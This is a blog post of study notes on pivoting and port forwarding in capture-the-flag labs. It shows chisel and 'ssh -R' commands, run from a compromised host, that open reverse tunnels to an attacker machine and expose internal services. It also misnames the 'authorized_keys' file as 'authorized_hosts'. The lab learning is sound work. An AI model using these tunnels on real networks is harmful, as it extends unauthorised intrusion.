Pivoting and Port Forwarding

Pivoting and Port Forwarding
Photo by Alina Grubnyak / Unsplash

The more difficult boxes I try to complete on TryHackMe or HackTheBox usually involve some form of port-forwarding or even pivoting onto a different machine.  I always seem to forget the commands to get this to work properly, so I thought I would have a go at writing about them here, in the hope that it either helps me to remember better, or at the very least I end up with a place I can go to find out what I need.

Chisel

Chisel is a fantastic tool which makes this process a lot easier.  The github page describes chisel as "a fast TCP/UDP tunnel, transported over HTTP, secured via SSH."

Chisel works with a client/server model.  Where you install the client or where you install the server depends on the type of routing you want to achieve.

Example: I have a foothold on a machine and it has a service that is only accessible from 127.0.0.1.  I want to be able to access this service from my attack box.

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::139                  :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::445                  :::*                    LISTEN      -     

Let's say I want to access the service on port 8080 from my own machine.  I can do this using the chisel binary by executing the following commands:

Attacking Machine

gareth@enso:~/Desktop/Tools/pivoting/Linux$ chisel server --port 8888 --reverse
2021/10/29 15:04:19 server: Reverse tunnelling enabled
2021/10/29 15:04:19 server: Fingerprint <redacted>
2021/10/29 15:04:19 server: Listening on http://0.0.0.0:8888
2021/10/29 15:06:47 server: session#1: tun: proxy#R:9000=>8080: Listening
This sets up a reverse tunnel listening on port 8888.

Victim Machine

john@writer:~$ ./chisel client http://10.10.14.75:8888 R:9000:127.0.0.1:8080
2021/10/29 13:06:47 client: Connecting to ws://10.10.14.75:8888
2021/10/29 13:06:48 client: Connected (Latency 27.477061ms)
The client connects to the server running on port 8888

What this is doing is saying, route the remote port 9000, remote in this case because it's referring to port 9000 on my local attacking machine, to the internal service hosted on port 8080.  Using the chisel server I have setup on my attacking machine's ip address on port 8888.

Result

Even though the result is a 400 error, this is actually good news because this 400 error is being returned from the web server running on port 8080 of the victim machine.  The route is established.

SSH Port Forwarding

The same result can be achieved using SSH which most machines already have installed.  In order for this to work though, we need to have some credentials we can use on the server to connect via SSH.

Let's say I have the private key for the john user on the remote machine, and I want to set up the same routing as before.  Using ssh and the private key, I can do the following:

gareth@enso:~/Desktop/Files/Writer$ ssh -L 9000:127.0.0.1:8080 john@10.129.249.94 -i id_rsa -fN

In this instance I'm telling SSH to connect local port 9000 to the localhost address on port 8080 of the machine at 10.129.249.94, using the key file id_rsa to authenticate with.

For individual port forwards like this, it's easier to use SSH to achieve port forwarding however you must have the ability to connect to the victim machine over normal SSH, which is not always the case.

Pivoting

Pivoting is leveraging the access you have on one machine, to gain access to another.  For example let's say you have compromised a public facing web server and you now want to connect to another machine inside the internal network, which is not exposed to the public.  You can pivot from the compromised web server onto the machine in this internal network.

Example: My machine has the ip address 10.10.14.75.  I have managed to gain access to a public facing web server at 172.16.0.5.  I have ran a port scan and determined that there is another server in the network, at 172.16.0.10 with a web server running on port 80.

The first thing I do is generate a throw-away SSH keys on the compromised machine.  I would then add the public key to the authorized_hosts file on my own machine.  This key will be used temporarily to allow a connection back to my attacking machine, from the compromised web server.  Let's say the private key is stored in a file called id_rsa_throw_away on the web server.  The command I would run on the web server at 172.16.0.5 to gain access to the internal server at 172.16.0.10 would be:

ssh -R 8000:172.16.0.10:80 gareth@10.10.14.75 -i id_rsa_throw_away -fN

I can then access the web server running on the internal machine from port 8000 on my local machine.  It is crucial to remove the public key from your local authorized_hosts file when you are finished with the engagement, and preferably also delete the private key on the compromised web server as well.

Summary

This barely scratches the surface of what's possible with chisel and ssh. There are a number of other useful tools for both Windows and Linux that are definitely good to have in your toolbox.

This HackTrickz page is a great place to learn more about what's possible.